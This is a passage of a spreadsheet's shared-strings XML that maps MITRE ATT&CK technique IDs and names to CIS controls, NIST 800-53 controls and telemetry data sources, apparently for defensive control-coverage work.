  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.8,16.1,16.9</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-5,CM-6,IA-12,IA-2,IA-5,RA-5,SA-10,SA-11,SA-15,SA-16,SA-17,SA-3,SA-4,SA-8,SC-28,SI-4,SR-6</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Process: Process Creation, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>Account Manipulation</t>
  </si>
  <si>
    <t>3.12,3.3,4.1,4.2,4.4,4.7,4.8,5.3,5.4,6.1,6.2,6.3,6.4,6.5,11.3,11.4,12.2,12.8,16.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CM-5,CM-6,CM-7,IA-2,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>Exploitation for Client Execution</t>
  </si>
  <si>
    <t>AC-4,AC-6,CA-7,CM-8,SC-18,SC-2,SC-29,SC-3,SC-30,SC-39,SC-44,SC-7,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Boot or Logon Initialization Scripts</t>
  </si>
  <si>
    <t>2.7,3.3,4.1,5.4,6.1,6.2,6.8</t>
  </si>
  <si>
    <t>AC-17,AC-3,CA-7,CM-2,CM-6,CM-7,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>Signed Script Proxy Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>Automated Collection</t>
  </si>
  <si>
    <t>3.11,11.4,12.8</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,CM-2,CM-6,CM-8,CP-6,CP-7,CP-9,SC-36,SC-4,SI-12,SI-23,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>Hardware Additions</t>
  </si>
  <si>
    <t>1.1,1.2,1.4,4.1,4.2,12.2,12.6,13.9</t>
  </si>
  <si>
    <t>AC-20,AC-3,AC-6,MP-7,SC-41</t>
  </si>
  <si>
    <t>T1558</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,5.4,5.5,6.1,6.2,6.8,18.3,18.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,IA-2,IA-5,SC-4,SI-12,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Access, Drive: Drive Modification, Driver: Driver Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>2.5,4.2,4.4,7.6,9.3,13.3,13.4,13.8,18.2,18.3</t>
  </si>
  <si>
    <t>AC-17,AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,SC-7,SI-10,SI-15,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Deletion, Command: Command Execution, File: File Deletion, File: File Modification, Image: Image Deletion, Instance: Instance Deletion, Process: Process Creation, Snapshot: Snapshot Deletion, Volume: Volume Deletion</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>2.3,2.7,4.1,4.8,7.1,7.2,7.3,7.4,7.5,7.7,9.4,18.3,18.5</t>
  </si>
  <si>
    <t>AC-10,AC-17,AC-6,CM-2,CM-6,CM-8,RA-5,SC-18,SC-44,SI-2,SI-3,SI-4,SI-8</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Process: Process Access, Process: Process Modification</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>Brute Force</t>
  </si>
  <si>
    <t>4.1,4.7,5.2,5.3,6.3,6.4,6.5,4.10</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CA-7,CM-2,CM-6,IA-11,IA-2,IA-4,IA-5,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>7.1,7.2,7.3,7.4,7.5,16.1,16.11,16.12,16.2,16.3,16.4,16.5,18.3,18.5</t>
  </si>
  <si>
    <t>CA-2,CA-7,CM-11,CM-7,RA-10,RA-5,SA-22,SI-2</t>
  </si>
  <si>
    <t>File: File Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>Browser Session Hijacking</t>
  </si>
  <si>
    <t>3.3,4.7,5.3,6.1,6.2,6.8,14.4</t>
  </si>
  <si>
    <t>AC-10,AC-12,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,IA-2,SC-23,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1584</t>
  </si>
  <si>
    <t>Compromise Infrastructure</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>Access Token Manipulation</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CM-5,CM-6,IA-2</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, User Account: User Account Creation</t>
  </si>
  <si>
    <t>T1005</t>
  </si>
  <si>
    <t>Data from Local System</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,IA-2,IA-5,SC-28,SC-39,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Script: Script Execution</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>Network Share Discovery</t>
  </si>
  <si>
    <t>4.1,18.3,18.5</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>Exploit Public-Facing Application</t>
  </si>
  <si>
    <t>3.12,4.4,4.7,5.3,5.5,6.1,6.2,6.8,7.1,7.2,7.3,7.4,7.6,7.7,10.5,12.1,12.2,12.8,16.13,16.8,18.1,18.2,18.3,13.10</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-2,CA-7,CM-5,CM-6,CM-7,CM-8,IA-2,IA-8,RA-10,RA-5,SA-8,SC-18,SC-2,SC-29,SC-3,SC-30,SC-39,SC-46,SC-7,SI-10,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>Exploitation for Privilege Escalation</t>
  </si>
  <si>
    <t>AC-2,AC-4,AC-6,CA-7,CA-8,CM-2,CM-6,CM-7,CM-8,RA-10,RA-5,SC-18,SC-2,SC-26,SC-29,SC-3,SC-30,SC-35,SC-39,SC-7,SI-2,SI-3,SI-4,SI-5,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>4.2,4.4,7.6,7.7,9.2,12.2,12.8,13.3,13.4,13.8</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-20,AC-23,AC-3,AC-4,AC-6,CA-3,CA-7,CM-2,CM-6,CM-7,SA-8,SA-9,SC-28,SC-31,SC-46,SC-7,SI-10,SI-15,SI-3,SI-4,SR-4</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Software Deployment Tools</t>
  </si>
  <si>
    <t>3.12,4.1,4.4,4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.4,6.5,6.8,7.1,7.2,7.3,7.4,7.5,12.2,12.8,14.9,15.7,16.1,16.8,16.9,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-12,AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-5,SC-12,SC-17,SC-46,SC-7,SI-2,SI-23,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>CA-7,CM-2,CM-6,SI-3,SI-4</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-3,AC-5,AC-6,CA-7,CM-5,CM-6,IA-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1014</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>Drive: Drive Modification, Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Exfiltration Over C2 Channel</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-20,AC-23,AC-3,AC-4,AC-6,CA-3,CA-7,SA-8,SA-9,SC-13,SC-28,SC-31,SC-7,SI-3,SI-4,SR-4</t>
  </si>
  <si>
    <t>T1572</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>4.2,4.4,7.7,9.3,13.3,13.4,13.8</t>
  </si>
  <si>
    <t>T1542</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>3.6,4.1,4.7,5.3,5.4,6.1,6.2,6.8,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-3,CM-5,CM-6,CM-8,IA-2,IA-7,IA-8,RA-9,SA-10,SA-11,SC-34,SC-7,SI-2,SI-7</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>3.11,3.12,3.3,4.4,6.1,6.2,6.8,11.1,11.2,11.3,11.4,11.5,12.2,12.8,16.8,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,CP-10,CP-6,CP-7,CP-9,SC-28,SC-36,SC-4,SC-46,SC-7,SI-12,SI-16,SI-23,SI-4,SI-7</t>
  </si>
  <si>
    <t>Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>Drive-by Compromise</t>
  </si>
  <si>
    <t>2.3,2.7,7.1,7.2,7.4,7.5,9.1,9.3,9.6,10.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-4,AC-6,CA-7,CM-2,CM-6,CM-8,SA-22,SC-18,SC-2,SC-29,SC-3,SC-30,SC-39,SC-7,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Container: Container Creation, Container: Container Start, File: File Creation, Image: Image Creation, Instance: Instance Creation, Instance: Instance Start, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Process: Process Creation</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>Browser Extensions</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,9.4,14.4,18.3,18.5</t>
  </si>
  <si>
    <t>AC-6,CA-7,CA-8,CM-11,CM-2,CM-3,CM-5,CM-6,CM-7,RA-5,SC-7,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1573</t>
  </si>
  <si>
    <t>Encrypted Channel</t>
  </si>
  <si>
    <t>AC-4,CA-7,CM-2,CM-6,CM-7,SC-12,SC-16,SC-23,SC-7,SI-3,SI-4</t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>Create Account</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5,11.3,11.4,12.2,12.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,CM-5,CM-6,CM-7,IA-2,IA-5,SC-46,SC-7,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>Shared Modules</t>
  </si>
  <si>
    <t>2.5,2.6</t>
  </si>
  <si>
    <t>CM-2,CM-7,SI-10,SI-4,SI-7</t>
  </si>
  <si>
    <t>Process: OS API Execution, Process: Process Creation, Process: Process Metadata</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t>2.5,3.3,4.1,6.1,6.2,6.8,10.5</t>
  </si>
  <si>
    <t>AC-3,CA-7,CM-2,CM-7,SC-4,SC-7,SI-10,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.2,4.4,4.7,4.8,5.3,6.1,6.2,6.8,7.6,12.2,12.8,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-4,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,IA-6,RA-5,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1020</t>
  </si>
  <si>
    <t>Automated Exfiltration</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Script: Script Execution</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>Implant Container Image</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,CM-7,IA-2,IA-9,RA-5,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Firmware: Firmware Modification</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>4.2,4.4,4.5,7.6,7.7,13.3,13.4,13.8,18.2,18.3</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>Driver: Driver Load, Process: OS API Execution, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1485</t>
  </si>
  <si>
    <t>Data Destruction</t>
  </si>
  <si>
    <t>T1059.001</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,9.7,10.1,10.2,10.7,13.2,13.7,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-5,AC-6,CM-2,CM-5,CM-6,CM-8,IA-2,IA-8,IA-9,RA-5,SI-10,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>Disable or Modify Tools</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, File: File Creation, File: File Metadata, File: File Modification, Firmware: Firmware Modification, Process: OS API Execution, Process: Process Creation, Script: Script Execution, Service: Service Creation, User Account: User Account Creation, User Account: User Account Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1003.001</t>
  </si>
  <si>
    <t>LSASS Memory</t>
  </si>
  <si>
    <t>2.6, 4.1, 4.7, 4.8, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 14.1, 14.3, 16.1, 16.9, 18.3, 18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,IA-5,SC-28,SC-3,SC-39,SI-16,SI-2,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: OS API Execution, Process: Process Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.4,4.7,4.8,5.3,5.5,6.1,6.2,6.8,7.1,7.2,7.3,7.4,7.5,7.6,10.5,12.2,12.8,16.13,16.8,18.1,18.2,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-4,AC-5,AC-6,CA-2,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-8,RA-10,RA-5,SC-18,SC-2,SC-26,SC-29,SC-3,SC-30,SC-35,SC-39,SC-46,SC-7,SI-2,SI-3,SI-4,SI-5,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Module: Module Load, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1530</t>
  </si>
  <si>
    <t>Data from Cloud Storage Object</t>
  </si>
  <si>
    <t>3.11,3.3,4.1,4.2,4.4,4.7,5.3,5.4,6.1,6.2,6.3,6.4,6.5,6.8,11.3,13.4,18.2,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,AC-7,CA-7,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-3,IA-4,IA-5,IA-6,IA-8,RA-5,SC-28,SC-4,SC-7,SI-10,SI-12,SI-15,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, Firmware: Firmware Modification, Network Traffic: Network Connection Creation</t>
  </si>
  <si>
    <t>T1548.002</t>
  </si>
  <si>
    <t>Bypass User Account Control</t>
  </si>
  <si>
    <t>4.1,4.7,5.3,5.4,6.1,6.2,6.8,7.1,7.2,7.3,7.5,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,IA-2,RA-5,SI-2,SI-4</t>
  </si>
  <si>
    <t>T1021.001</t>
  </si>
  <si>
    <t>Remote Desktop Protocol</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.2,4.4,4.7,4.8,5.3,6.1,6.2,6.4,6.5,6.8,7.6,7.7,12.2,12.7,12.8,13.5,13.10,16.10,18.3,18.5</t>
  </si>
  <si>
    <t>AC-11,AC-12,AC-17,AC-2,AC-20,AC-3,AC-4,AC-5,AC-6,AC-7,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,IA-5,IA-6,RA-5,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation</t>
  </si>
  <si>
    <t>T1021.002</t>
  </si>
  <si>
    <t>SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>4.1,4.2,4.4,4.5,4.7,5.2,5.3,6.1,6.2,6.8,7.6,7.7,12.2,13.4,18.2,18.3</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-4,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,SC-7,SI-10,SI-15,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Share: Network Share Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow</t>
  </si>
  <si>
    <t>T1003.002</t>
  </si>
  <si>
    <t>Security Account Manager</t>
  </si>
  <si>
    <t>4.1, 4.7, 4.8, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 14.1, 14.3, 16.1, 16.9, 18.3, 18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CM-7,IA-2,IA-5,SC-28,SC-39,SI-3,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Access, Windows Registry: Windows Registry Key Access</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>Clear Windows Event Logs</t>
  </si>
  <si>
    <t>T1059.005</t>
  </si>
  <si>
    <t>Visual Basic</t>
  </si>
  <si>
    <t>2.3,2.5,2.7,4.1,4.8,9.3,9.6,9.7,10.1,10.2,10.7,13.2,13.7,18.3,18.5,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-6,CA-7,CM-2,CM-6,CM-7,CM-8,RA-5,SC-18,SI-10,SI-16,SI-2,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Command: Command Execution, Group: Group Enumeration, Group: Group Metadata, Pod: Pod Metadata, Process: Process Creation</t>
  </si>
  <si>
    <t>T1003.003</t>
  </si>
  <si>
    <t>NTDS</t>
  </si>
  <si>
    <t>3.11, 3.12, 4.7, 5.2, 5.3, 5.4, 6.1, 6.2, 6.8, 11.3, 14.1, 14.3, 16.1, 16.9</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-3,AC-5,AC-6,CA-7,CM-2,CM-5,CM-6,CP-9,IA-2,IA-5,SC-28,SC-39,SI-12,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1542.005</t>
  </si>
  <si>
    <t>TFTP Boot</t>
  </si>
  <si>
    <t>4.1,4.2,4.7,4.8,5.3,5.4,6.1,6.2,6.8,8.1,8.2,8.3,12.2,12.5,13.3,13.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-7,CA-8,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-2,IA-7,IA-8,RA-5,RA-9,SA-10,SA-11,SC-34,SC-7,SI-2,SI-4,SI-7</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Metadata, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.2,4.4,4.7,4.8,5.1,5.3,5.5,6.1,6.2,6.8,7.6,12.2,12.7,12.8,13.5,18.3,18.5,13.10,16.10</t>
  </si>
  <si>
    <t>AC-11,AC-12,AC-17,AC-2,AC-3,AC-4,AC-5,AC-6,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>File: File Creation, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>T1566.001</t>
  </si>
  <si>
    <t>Spearphishing Attachment</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>External Remote Services</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.2,4.4,4.8,6.3,6.4,6.5,7.6,7.7,12.2,12.7,12.8,13.5,16.8,18.3,18.5,13.10,16.10</t>
  </si>
  <si>
    <t>AC-17,AC-20,AC-23,AC-3,AC-4,AC-6,AC-7,CM-2,CM-6,CM-7,CM-8,IA-2,IA-5,RA-5,SC-46,SC-7,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1048.003</t>
  </si>
  <si>
    <t>Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol</t>
  </si>
  <si>
    <t>AC-16,AC-2,AC-20,AC-23,AC-3,AC-4,AC-6,CA-3,CA-7,CM-2,CM-6,CM-7,SA-8,SA-9,SC-13,SC-28,SC-31,SC-46,SC-7,SI-10,SI-15,SI-3,SI-4,SR-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Drive: Drive Creation, File: File Access, Process: Process Creation</t>
  </si>
  <si>
    <t>T1602.002</t>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>Network Device Configuration Dump</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.6,7.6,7.7,12.1,12.2,12.8,13.3,13.4,13.8,18.2,18.3,18.5,3.10</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-18,AC-19,AC-20,AC-3,AC-4,CA-7,CM-2,CM-6,CM-7,CM-8,IA-3,IA-4,SC-28,SC-3,SC-4,SC-7,SC-8,SI-10,SI-12,SI-15,SI-3,SI-4,SI-7</t>
  </si>
  <si>
    <t>Container: Container Creation, Process: OS API Execution, Process: Process Creation</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>Application Log: Application Log Content, Container: Container Creation, Container: Container Start, Pod: Pod Creation, Pod: Pod Modification</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>3.12,4.1,4.2,4.4,4.6,7.6,12.1,12.2,12.8,13.3,13.4,13.8,18.2,18.3,18.5,3.10</t>
  </si>
  <si>
    <t>Command: Command Execution</t>
  </si>
  <si>
    <t>T1021.006</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>2.3,2.5,3.12,4.1,4.4,4.5,4.7,4.8,5.3,5.4,6.1,6.2,6.8,7.6,7.7,12.2,12.8,18.3,18.5</t>
  </si>
  <si>
    <t>AC-17,AC-2,AC-3,AC-4,AC-5,AC-6,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,RA-5,SC-46,SC-7,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1053.005</t>
  </si>
  <si>
    <t>Scheduled Task</t>
  </si>
  <si>
    <t>4.1,4.7,4.8,5.3,5.4,6.1,6.2,6.8,8.3,18.3,18.5</t>
  </si>
  <si>
    <t>AC-2,AC-3,AC-5,AC-6,CA-8,CM-2,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,RA-5,SI-4</t>
  </si>
  <si>
    <t>T1078.004</t>
  </si>
  <si>
    <t>Cloud Accounts</t>
  </si>
  <si>
    <t>4.7,5.1,5.2,5.3,5.4,5.5,6.1,6.2,6.3,6.4,6.5,6.8</t>
  </si>
  <si>
    <t>AC-2,AC-20,AC-3,AC-5,AC-6,AC-7,CA-7,CM-5,CM-6,IA-12,IA-2,IA-5,SA-10,SA-11,SA-15,SA-16,SA-17,SA-3,SA-4,SA-8,SC-28,SI-4</t>
  </si>
  <si>
    <t>Command: Command Execution, User Account: User Account Metadata</t>
  </si>
  <si>
    <t>T1213.001</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>Confluence</t>
  </si>
  <si>
    <t>3.1,3.2,3.3,4.7,5.3,6.1,6.2,6.8,14.1,14.4,14.5,16.1,16.9,18.3,18.5</t>
  </si>
  <si>
    <t>AC-16,AC-17,AC-2,AC-21,AC-23,AC-3,AC-4,AC-5,AC-6,CA-7,CA-8,CM-2,CM-3,CM-5,CM-6,CM-7,CM-8,IA-2,IA-4,IA-8,RA-5,SC-28,SI-4,SI-7</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation</t>
  </si>
  <si>
    <t>T1213.002</t>
  </si>
  <si>
    <t>Sharepoint</t>
  </si>
  <si>
    <t>Command: Command Execution, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1569.002</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1557.002</t>
  </si>
  <si>
    <t>ARP Cache Poisoning</t>
  </si>
  <si>
    <t>4.1,4.2,4.4,4.8,7.6,7.7,12.2,13.3,13.8,14.2,14.6,18.2,18.3,18.5,3.10</t>
  </si>
  <si>
